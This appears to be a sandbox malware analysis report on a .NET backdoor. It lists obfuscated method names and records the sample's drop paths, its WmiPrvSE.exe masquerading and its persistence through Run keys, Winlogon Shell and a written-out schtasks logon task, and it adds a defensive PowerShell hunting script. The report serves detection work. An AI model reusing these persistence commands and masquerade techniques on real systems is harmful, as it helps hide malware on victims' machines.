                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, DtiQNXjdBKiyGCOvD7l.csHigh entropy of concatenated method names: 'XKXGeTLevK', 'hlvGxfq8qK', 'qWWG0VJseN', 'fav2ZXZnTNyrjsRYM7r', 'QW9CBHZZdCdybQ505Yx', 'jdJKR5ZaV5nwqvhBbNC', 'IikqRQZJsoY0uKrVjif', 'PsAYtwZsJ25HO0TmTIY', 'ObhSeDZkZW5qe9fm9qL', 'mu9iyHZL3OMw67RoPt3'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, aYaQnSJwulneSmoDLNw.csHigh entropy of concatenated method names: 'NKM34rKGWm', 'XVypTElmCoLeojZQyEY', 'KuLj3Il0EN6RB4jIhtZ', 'EbfbDYl5UGaMdtWxx3R', 'XeQPZhlzgi0w5nHRHV1', 'COU4wylLmTpWBR7aGmm', 'TT08GvlSwapWW1xVTde'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, dUgS0snbvhh3GbZ8DUb.csHigh entropy of concatenated method names: 'AHuPqqLGvlYe6LNJ8lg', 'bUsvYkLb80Q8HRA1wUW', 'KE47MGLB6PIfj18nrpb', 'MbwT2FLuSJJMq4kGPdk', 'lnWsKKq5SK', 'CmcM3', '_9J199', 'RPesq9fGN0', 'l6Ysa7IJkb', 'OEJs2sbFe0'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, LMTmWij3g2SbFk7cM97.csHigh entropy of concatenated method names: 'wmKN9X0i7b', 'KllNzljryU', 'f2mGh019CC', 'RmHOWNZ6htdbPwFvibm', 'sxdMufZNOvMhMWDnJcn', 'gUQ6r1Zgy8fBqkxBoLP', 'e2BqkPZPNyPcZQdM8KT', 'MIZZKcZIdb31pHxxBmx'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, gcg3sOJSFHrZmotjqRS.csHigh entropy of concatenated method names: 'PNbSi5gwNP', 'eFnSvU9uUw', 'TO7S7yVqCK', 'silSM8U1X5', 'XgxSKbL3vQ', 'lnGBURRju4', 'B4rBoG8GHX', 'jBUBfcyGkK', 'WZEBQvS1go', 'u09BKDON7O'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, PPwvUbpvFfns5Qr3oZQ.csHigh entropy of concatenated method names: 'Pigx5LPRN9', 'v0EinxXqV09viVPEy0L', 'd9amLgXflPXj9oWKfXO', 'dPQTCHTzopujcusXoMm', 'FwRMmhXyh7R190Bp9HU', 'LTIZr6XM8Jj96iWvR0t', 'PQSQ9ZXw5LJCgNmsQNO', 'GHIaiAXUvZ7PkYlK4lM', 's1nWwYX1ysd052XNT90', 'AWGW5XTnppI3iUpMNDf'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, puOhCL6TSKilrZYAMPn.csHigh entropy of concatenated method names: 'dSp0VCWRGS', 'DwBL2JGpdcKa5PTxqCi', 'K8PGTxGN5DqJu3AoBv3', 'PkG5jPGgLc83uwDNtSR', 'r6le9OG6G7qxRUmNIg8', 'qbm6FMGP0LySmJCQGoC', 'McajeBGI4tfxN6dyCHi', 'uMnv6BGZUAU4lBfcZyf', 'EI0Tn7GaMWYbv2WnMRv', 'FOMFZPGne9H9IZCMbLu'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, Q5AYRmpBpEZdAUKyh22.csHigh entropy of concatenated method names: 'tvJVFZv0hkuYdeoriWn', 'RDLAjsv5eIGhTn2JWUe', 'jRjQgpvzumVejVJwjhv', 'c5E73eDynI8iLBjEFOP', 'hytEeEDqOBNr9DNFyVQ', 'choTiRDfIIomGarM1ql', 'bHntiTDMjlH96ukla1j', 'KsBOjPDwOSl8eVSoIMl', 'BYf4MjDUuMJkb25E2DN', 'PuWIvuD17gCfhqdZlSs'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, CdsP9kjkxmjYQxmv753.csHigh entropy of concatenated method names: 'cSHEgoabN8f84xN8ON1', 'sT4DxRarKPUFOOyMDT1', 'lGw4LnauEKNrDhP5Fh6', 'zOHewbaG7WFJujia7n7', 'LvX3KEaho36FvvxptlP', 'bEOoRQa2UJYOZIvNVIy', 'lslthdaAd7EdMGcfdrl'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, IMsLZqJESnUQpUSitZt.csHigh entropy of concatenated method names: 'eBq65', 'PP238', 'LZDSAWeger', 'PuNSXg5SD8', 'SwIS8herKl', 'yhWSn7jE3l', 'LRlSHv4NbX', 'XmBSWaaxbS', 'kULSOHgf3r', 'nVTSYFwInL'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, dJjx6CM6xZweXYbnH7.csHigh entropy of concatenated method names: 'B5bMGuwbM', 'EFlKyVNIH', 'pb2ZE7MMr45fgJHUZVX', 'Vnfv7oMw5joTlGJJ8pM', 'LyFKuOMqlBaIosoNDdH', 'cWV1ofMfJjESKVGhCLB', 'PUqvP6MU1UcI43bFiD9', 'omEDecfnM1tmnB2gssU', 'Pf0QASfJrQYd4HExZEG', 'VkAcW6fsjpPuKnfsdfS'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, fZDaE8XWphCxYK1rG6D.csHigh entropy of concatenated method names: 'SjmLqY0LKC', 'h1oLaOaigq', 'T5JL2lrtRc', 'PKnL1B4lDE', 'JSjLyNvMG3', 'NU1Zb0jvc0jeBAuAkIO', 'Y0RYv3jDN1VJYlwT9q7', 'LGl1DXjU9eRyGMcNxyo', 'KLVYXXj1VEZsq7w1WUA', 'VOOrydjT4N1DQRCpveX'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, kA7kVheXtKfgjQcmYwh.csHigh entropy of concatenated method names: 'w47J3', 'nm6tsdMMf3', 'TdCtbmSojE', 'MDqtCElhso', 'g4CtZdPMCN', 'AmVt6eBWbf', 'Kgetpudu9a', 'sU8JGajlpmwCYm9Ug6n', 'fnmnY4jxppuy99Kw05Y', 'XBwQDujWFpO1IWrQUIO'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, E2GrLInv9OEjUR3px8m.csHigh entropy of concatenated method names: 'gJEZ6uVbLy', '_1Y76E', '_2n9h3', '_36fEX', 'v3aZpP4nQB', '_52X5N', 'wcyZkpmv0g', 'imAZr5OLf4', 'veA7l', 'oOkZusl1Vq'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, TCLdvBevII8QbvFJE1d.csHigh entropy of concatenated method names: 'eOj6S', '_92951', '_1e8S4', '_2jK67', 'W54Lj', 'm4sAw5LqHM', 'UqxAoXFk43', 'E6sxM', '_83R52', '_4q255'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, KHde81eAUUJNk258utB.csHigh entropy of concatenated method names: 'Rg8ttaPHfN', 'mF2tFQbxQe', 'CtAtAXJJiQ', 'syXYjbjFI1UF0pMedwl', 'fEnkOVjEUOp7xeB2E7H', 'bHp3hHjYpTkaesSrggp', 'mJgm7PjdlNll5025Wtl', 'Pta2SEjcWoC6YZpwp6N', 'LEAhQrjeOYWKZZG0Xsx', 'hIDHnIjVynRRK6yaLso'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, otwGicgTg0LsrtQRY9L.csHigh entropy of concatenated method names: 'uKapkkJRqj', 'zalpr0Gx18', 'R6hputNFX2', 'uampg26bc1', 'a37p4SaS8O', 'GogpBqT0cQ', 'ww9pchMUJL', 'ijKpix4Uh0', 'ghHpvULskQ', 'iuyp7tqMcv'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, ps321YXUFJJE9Jgue9H.csHigh entropy of concatenated method names: 'Oe17g', 'VIwBGbUAf0', 'R3WU3lrOgb', 'OHhBsJNeUm', 'eEJycH4UOCC8SylxDqq', 'vna99641JowCP0yuAfm', 'brniYw4vci6CjtegIkY', 'yOGExD4Md2P20qN2tdu', 'u76JUQ4wvDkI5ldQhDi', 'NDJcsK4DnROtRVBLJ9b'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, FehONtm44optieloZT.csHigh entropy of concatenated method names: 'Ae9TyhwbPqvkVYLAXro', 'RFUh4awrgsy9tlyVKg7', 'uhxctuwhM1piFSbPS9A', 'oZUZeUw2CjxFwD0GbDT', 'SJUvvtwA7xiN3PMpNqt', 'uDuvdYwi7AH5DSgwbQP', 'oeK6mnwKFeks1gvFITO', 'P6K6ukw7i8lrJDZbY1g', 'jBmajXw3NIOL5EnhS77', 'pkWFb8wtM1AwMMZhwQe'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, zMrJjv4CkNGBY5Btp2.csHigh entropy of concatenated method names: 'ipIlS1UFjkbSAYLcKdh', 'NHxr5IUEFLXD6h0jn0t', 'Qqna0HUYIseLAct1wkG', 'mMqYJDUdFxWaKjH4wmv', 'Q6ietkepF0', 'rXteFSLrfM', 'WqbeA2Ilqo', 'KiWeXcTy85', 'C7ce8PYfBV', 'qMwAexUVNjoeFvxaQOS'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, R8gDcpp20IMugdND0dD.csHigh entropy of concatenated method names: 'wVhMrRDzKhm4wBIpB1X', 'FxkncbTycvqKcUtQWb1', 'dZfRKyTqeFL8jiPhDXd', 't8DTIDTfkxjEVvMNhA9', 'RkGto9TMFkrm6dmjRkX', 'lAxwVvTwN7KtL4ZSmRR', 'bnHSyQTU6VPgsMnwOr8', 'umPBPqT1EQYBTRQkUiw', 'gPOljDTvj9TSbXAnc3W', 'Tua1KgTDNg9Zni2SkYx'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, g5oiWspbwY0I3PEKHiw.csHigh entropy of concatenated method names: 'IOMhjbDxfuVKoS0FBE9', 'PtimaBD4Tk8iElyJwjq', 'gqIB5EDosmNmmgY7E3h', 'WxkMgHDQMsKAf4HpCl4', 'qlbED6DjfwaSiFSLRnS', 'whINMTDCQuhQnZlaLml', 'PDE0x8DRsjc0jW6tiXI', 'qIuXXlDH9f56Tl3EJb0', 'AHLCyFD8SraJB6d0WN7', 'yWS4jPDprqSeUBsBYAq'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, L8CvfGAq7U40dEfP524.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'tvmdfbEivk', 'e4Vddj5UJR', 'GgEdlXM6BG', 'cjedTWa5md', 'r2DdQXBSOU', 'bKT5B9YcRkkWZB9OMjJ', 'ow91x9YeV3cl9VTGkLn', 'SyHc0hYFu3OJnBwm0jL'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, EXvdXNeLe38a7q87AOo.csHigh entropy of concatenated method names: 'SPkXTX4uJQ', 'ClKAK5vVUk', 'a6SAqP5FE4', 'Re4AadqgHW', 'qaPA2vfdcl', 'UseA1Ev0bM', 'w2EAyiuIyW', 'LUYAJIMShP', 'qH4AjZNo3T', 'QrYARVp5TJ'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, OX8gNUJG8mxYYxf3H4a.csHigh entropy of concatenated method names: 'wIcBhwSuDV', 'oSPBwNHFR4', 'SU5B9Aa6aT', 'sFoBnflFDg', 'RmusWflh6sSMq5iUUPs', 'VlrmNul2L12C66lsFEn', 'HC4ebjlAEpsnNUH2BK9', 'WQKL6YlisqU39UTfyRA', 'I9BDhBlKMoS9C2Uqqg9', 'Vb3JNnlbSxM9jMcog9j'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, QL2grUjCL9LYx4NWghg.csHigh entropy of concatenated method names: 'MG4Gt6RtMS', 'rL3GFjiKKA', 'iEqGATp2i3', 'qlNGXLb5Aq', 'jTdG8beqs9', 'hKIGnE06eX', 'yLMGHZk4w2', 'ld5GWumxQM', 'jVJGOjlBtn', 'xBKGYJ2SDx'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, iLigcI6eXMwvYq3Rqyx.csHigh entropy of concatenated method names: 'Mre00UayOe', 'fl00mV1lsX', 'deq0D9O53l', 'dM4y4aG2cLYvOo1updE', 'TnM7xSGAHb2yE7avBJm', 'j58TrRGrbk9QKHPnhau', 'oIcBx5Ghy0RKw3FriEf', 'Vy68l5Gia7xVknV6EMU', 'qUsXeTGKjSNF2nh5hZE', 'mx4CvwG7n0rhj2hfDuI'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, DC5nLMj0QuivAWvoKMe.csHigh entropy of concatenated method names: 'oOnGDYTQP0', 'KdeGPqtIk4', 'zQ0GfRjWNQ', 'np2GdCEMQG', 'sJrGlEmmVx', 'VQOGTI4rDX', 'WgTdD8Z0m7g6j5WL8mC', 'RO238IZSqkfG6Iuriih', 'VPbpiYZmVdkq9aPsMeR', 'R38sDDZ5ohSe25yfOl9'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, hcWAmbeDOypWTI632mO.csHigh entropy of concatenated method names: 'n7VXrq2dnZ', 'CmNXgTRKn8', 'enKX5jixTp', 'wcAXIoQ6OE', 'tabXwjMM4b', 'aRgXo1J8af', 'AZlXN8vUP5', 'Y6ZXGJM3Vm', 'kj8XEYDGF9', 'TcVXsnEJ4s'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, SEs5x8W1W9AVrylf92.cs | High entropy of concatenated method names: 'YbLk3112P63bXmxvBJ1', 'Yo6R9g1Aapul8wvcCIp', 'xF2uwW1iixpfIFlKoIq', 'KHCwh11KClAqjocaG0F', 'nd4F6Z1710IM0Up2lpp', 'mFPFYB13bTjCStIoGoY', 'SRlKRb1tsxltS1wP0ag', 'PRsPwt1O4ctdwFdXXne', 'd4UB661YMTMVItVpwLh', 'TWr4FU1dYmxQdEOo9TO'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, cTLDEGnr3gFgBnQWwS3.cs | High entropy of concatenated method names: 'KmLr0hTTTKQyM', 'tUE1ZomYjbLPx3bRfZt', 'V22ivNmdNSMpSd8D5qh', 'wTg9HtmF9mqUtOyKHEK', 'IQtX1nmE4UShVD98mUM', 'PMuRE7mcneoBpQucTsR', 'mAxshfmtLmqGpkcGBlF', 'Y2AmWfmOWgFEIPE3cCf', 'jKPhtmmer06tHtgvvaD', 'Bkca51mVCUWQrGDi3FZ'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, gwxcXy68BwxujC1p2i4.cs | High entropy of concatenated method names: 'h0dmH9OnEc', 'nF4mWwUqDq', 'rycmOQ25pR', 'ACwShT2bkVlLjo6dSFy', 'djNdJf2rX8XeFgs36Jo', 'BUqxRI2uk6C56FFJq69', 'AgOPVd2G1yjilkjMiKi', 'tVv7te2hcWgICe30j9K', 'Cvtqf722uyLu1owxfW0', 'KgAT4L2AYbx6xUMu4Vg'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, qLGDGgAM3fcLErEJhK1.cs | High entropy of concatenated method names: 'B2odhdbAcS', 'OKohqEY2P0DJl53FtLc', 'talhu3YAqMyB6vFtDdD', 'WsGaoeYr0KAdkQw0vws', 'lybhESYhHaPxknUghAv', 'fsZkZRYieLbCLUmQVW4', 'BLTdPuYKl1GDjBmuto7', 'JJly7XY7503UirG04JN', 'HQqvh6Y3fkFeIMSKpr9', 'SZD7olYtPaDEKTFL6pK'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, NFw1LVJnX1jvuRGynUV.cs | High entropy of concatenated method names: 'aoJTN7Ci67', 'w0wTGYsQMB', 'SG7LUaEKg7q6fJSDngI', 'EcvcZrEAxI4hbHNbpM8', 'FarmJmEi9smHG9LEfXH', 'peJypbE7fDrUJvYDSyb', 'Tlhu4fE3KOaXFjpEEgZ', 'bDNAadEtO6wsMNUJJsp', 'NuxTWq5ZRK', 'jDdTOecAW4'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, aTyydwA62jtRQR5olI5.cs | High entropy of concatenated method names: 'EdyD29H9oQ', 'wZSD1VLR3O', 'y72DyKJhNA', 'vbdDJTqA1C', 'St3DjK8YPx', 'LsuFuh72wXddlFZS3w7', 'EOLZvh7Ag6GrVap7FLt', 'InTORj7rGuk4yF20x8K', 'cfKbY67hjwulwv5c5bt', 'Kvtm7A7ijhSQlGhsPhl'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, rY6Nepj5ZPCXPNrSare.cs | High entropy of concatenated method names: '_6GH8g', 'qDV8p', '_6WhTf', 'cp2GpsQvvm', '_1Kw16', 'qY8k8', '_1Y29k', 'B271Y', '_8m283', '_43N1B'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, ftopJGJ1ppVr79n0Efx.cs | High entropy of concatenated method names: 'LPxQSxZOim', 'AqfLAfclV7a0IbU0bwH', 'cIZHKScxdm02RCa3XXw', 'H1YcxUcWadMnHu4ZOin', 'U7hYTWc9PXLq7TlPUAh', 'bvEu9Oc45jFGiFnyZ7u', 'VlNLsUcoaZUCJNjmwcl', 'lpc8HbcQt0Nv31MS4df', 'qmL9ivcj8KIZ9a6iJeS', 'V3nnPncCF2kVu2KiBpc'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, JI1yXq6M4CtMce966nF.cs | High entropy of concatenated method names: 'XvCmeUCa9k', 'ljqmxsOUJ7', 'J12UvBhD60unoVoN2Jg', 'fb10eUhT2wnFUKq31Rh', 'rvhDr5hXDnLGMADxqQ9', 'Y6JWEHhBxoyfmY6pEFk', 'ualoldhuFbW7nhJBxHf', 'jfDuY9hGuuasGwXiXKH', 'nAXvPjhbpM2ojed5f01', 'UBsls3hrM0nuExkZn6S'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, VtuN5UXrw2EOUdP7ZRS.cs | High entropy of concatenated method names: 'QdJ19', 'lzo13', 'C836T', '_279mE', 'Me7sn', '_4f3qD', '_7Sz4L', '_62Ph5', '_4X4vQ', '_4AS9R'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, BLfsiMCf3Tu33H6atI.cs | High entropy of concatenated method names: 'D9Om5cMdydSYOhlT42x', 'zPAg7tMFjaWylXqDbUy', 'YXPEgdMEeF3ot6fFU18', 'XocNaFMcTWgccNMqjuy', 'CAHcllMe7KduFoyxMeU', 'i1wa5iMVl6GhJ9g31Y8', 'tPkNkdMWuOLwawCbBHM', 'TmxXSMM9oY60WMho0Fi', 'aN1cTfMl51QGQY6aPOX', 'r2uLytMxoUr1CbosV5L'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, u4aQ6gpnTIlVd3sU1Bk.cs | High entropy of concatenated method names: 'OQgwFmvB1yBuuEJpSgp', 'qDoEqKvuLDoIbU4OpYv', 'ujtB9svGukMQGKQUXdp', 'ROoDBwvbya4kkaMU5L6', 'Vj0fulvr62qmpS0wR12', 'bVEcERvh7cGqb0seLOo', 'SJaB5Ov2omulXTB8NQO', 'Y9AX32vARg3ghQvQeOf', 'Vuv2olviTxL6GSdFM9f', 'do5OgqvKRym6d77waVk'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, bHrGAKjN9pBd5IBSIMK.cs | High entropy of concatenated method names: 'WFQE8Ys2S9', 'ST2EnibUdl', '_67WmM', 'm9LEHJ42Kl', 'gnVEW94wf5', 'yhtEOiH56G', 'jc5EYaREOS', 'z1D1OtJdEmvow5AsqlL', 'nSrKLtJFe9L9ITuGggS', 'WhFqmUJEGZRQcUq1wet'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, mNw1SmphLinP6DdtkDF.cs | High entropy of concatenated method names: 'Yax8IgDBVdpOQdY3LQI', 'UVcKyvDuTF1Ji9FgfcU', 'isx9fIDGgoCyrOB3T1I', 'qqRo8iDb4tNAdxdiXKf', 'wMqDR1Dr05gixIawn1q', 'ygO6gjDhQME7vyRnNA4', 'W7HUjmDTClwYN0ClRUS', 'NNv6bRDXRxIOlly3H2e'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, yWdxewpDXWndfyssTx0.cs | High entropy of concatenated method names: 'PdKNnbXKhL8pFdk1Cgb', 'Cw2QqJX77JsUPYa83gY', 'KlJQb0X34kU16NkZRoc', 'gM57RQXtvxcAFbQvaue', 'sQ8SSKXOLNsh2IRAOB2', 'tbRsGZXYL6aNBPlRBxJ', 'F3F4RQXdkS9AgWDdFTg', 'VCuFc7XFm0P1nK25xTU', 'gCE8PKXEwoptJBISgNG', 'WqESulXA5edfs5KQZ2h'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, JSNyubnze1kgf4601GJ.cs | High entropy of concatenated method names: 'P2pDWBmQS1UBRi2C8bK', 'PsUGHpmjX1D6aXKEtsu', 'tPYtUwm4QW3phGBm0Xg', 'ziBxMhmo8R19DUwHpDc', 'LlXpI1UF3h', 'Ty4aBdmHEpXkKamOGRV', 'YTmMogm8kO4DvMWPPJc', 'F3nfMZmpMk4uij0MFwR', 'nO1I1EmNgyIwvH419uQ', 'x5yRHsmgphbd0TmgA5x'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, VD6rKOpReI971P3wXkH.cs | High entropy of concatenated method names: 'btRbdDDnqBsg3CbLX5o', 'CL8xVCDJX0pVHK7MPwm', 'MC4C9FDsrCkwn2jckof', 'SdkX94DkqphjC4Q1w2Z', 'TjIrpODLn3IULX2eHtH', 'GnA93sDSvk8aFIsXENa', 'PK8iFyDmBdNe4UR3ZkA', 'e2kkwaDZC14vbgf8mG4', 'P3FetSDaWYvmAOGJGLy'

                        Persistence and Installation Behavior

                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (3 occurrences)
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | File written: C:\Users\user\AppData\Roaming\Adobe\hui.exe
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | File created: C:\PerfLogs\KQihinlofznONtA.exe
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | File created: C:\PerfLogs\WmiPrvSE.exe
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | File created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | File created: C:\Users\user\AppData\Roaming\Adobe\hui.exe
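The installation pattern recorded above (a second-stage dropper in %APPDATA%\Adobe, copies named WmiPrvSE.exe placed under C:\PerfLogs and under a Windows Defender ATP language folder, and child processes launched through WMI Win32_Process::Create) can be checked on a suspect host with the following PowerShell. This is an added hunting example, not part of the Joe Sandbox report and not code from the sample: it lists every WmiPrvSE.exe outside the two legitimate wbem directories with its hash and Authenticode status, lists executables in C:\PerfLogs (a Performance Monitor output folder that should hold no binaries), and reports live processes whose parent is a WmiPrvSE.exe process, which is how children created via Win32_Process::Create appear in the process tree. It assumes an elevated PowerShell 5.1 or later session on the host being examined; the search roots are a hunting choice, not something the report specifies.

```powershell
# Added hunting example; not part of the Joe Sandbox report or the analysed sample.
# Assumption: run from an elevated PowerShell 5.1+ session on the host under examination.

function Get-MasqueradingWmiPrvSE {
    # The genuine WMI provider host exists only at these two paths.
    $legit = @(
        (Join-Path $env:SystemRoot 'System32\wbem\WmiPrvSE.exe'),
        (Join-Path $env:SystemRoot 'SysWOW64\wbem\WmiPrvSE.exe')
    )
    # Search roots are a hunting choice: the locations used by this sample plus common drop folders.
    $roots = @((Join-Path $env:SystemDrive 'PerfLogs'), $env:ProgramFiles, ${env:ProgramFiles(x86)},
               $env:ProgramData, $env:APPDATA, $env:LOCALAPPDATA) |
             Where-Object { $_ -and (Test-Path -LiteralPath $_) }
    Get-ChildItem -Path $roots -Filter 'WmiPrvSE.exe' -Recurse -File -Force -ErrorAction SilentlyContinue |
        Where-Object { $legit -notcontains $_.FullName } |
        ForEach-Object {
            $sig = Get-AuthenticodeSignature -FilePath $_.FullName
            [pscustomobject]@{
                Path      = $_.FullName
                SHA256    = (Get-FileHash -Algorithm SHA256 -LiteralPath $_.FullName).Hash
                Signature = $sig.Status                     # NotSigned, HashMismatch, Valid, ...
                Signer    = $sig.SignerCertificate.Subject  # $null when unsigned
            }
        }
}

function Get-PerfLogsExecutables {
    # C:\PerfLogs is Performance Monitor's output folder; any PE file there is out of place.
    $dir = Join-Path $env:SystemDrive 'PerfLogs'
    if (Test-Path -LiteralPath $dir) {
        Get-ChildItem -Path $dir -Include '*.exe', '*.dll' -Recurse -File -Force -ErrorAction SilentlyContinue |
            Select-Object FullName, Length, CreationTime, LastWriteTime
    }
}

function Get-WmiSpawnedProcesses {
    # A process created through Win32_Process::Create is a child of the WmiPrvSE.exe host that
    # served the call, so report every live child of any process named WmiPrvSE.exe. The parent's
    # own path is included: a parent outside System32\wbem is itself a masquerading copy.
    $procs = Get-CimInstance -ClassName Win32_Process
    $hosts = @{}
    foreach ($p in $procs) {
        if ($p.Name -ieq 'WmiPrvSE.exe') { $hosts[$p.ProcessId] = $p.ExecutablePath }
    }
    foreach ($p in $procs) {
        if ($hosts.ContainsKey($p.ParentProcessId)) {
            [pscustomobject]@{
                Pid         = $p.ProcessId
                Name        = $p.Name
                Path        = $p.ExecutablePath
                CommandLine = $p.CommandLine
                ParentPid   = $p.ParentProcessId
                ParentPath  = $hosts[$p.ParentProcessId]
            }
        }
    }
}

Get-MasqueradingWmiPrvSE | Format-Table -AutoSize
Get-PerfLogsExecutables  | Format-Table -AutoSize
Get-WmiSpawnedProcesses  | Format-Table -AutoSize
```

Management agents that drive WMI remotely (configuration-management clients, monitoring tooling) also produce children of WmiPrvSE.exe, so the third list needs triage by Path and CommandLine rather than being treated as a verdict; the dropped copies from this analysis would surface in the first list as unsigned or non-Microsoft-signed files in directories where the provider host never lives.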

                        Boot Survival

                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KQihinlofznONtA
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE
                        Source: unknown | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KQihinlofznONtA" /sc ONLOGON /tr "'C:\PerfLogs\KQihinlofznONtA.exe'" /rl HIGHEST /f
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell (3 occurrences)
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KQihinlofznONtA (2 occurrences)
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KQihinlofznONtA (2 occurrences)
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE (4 occurrences)
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE (4 occurrences)
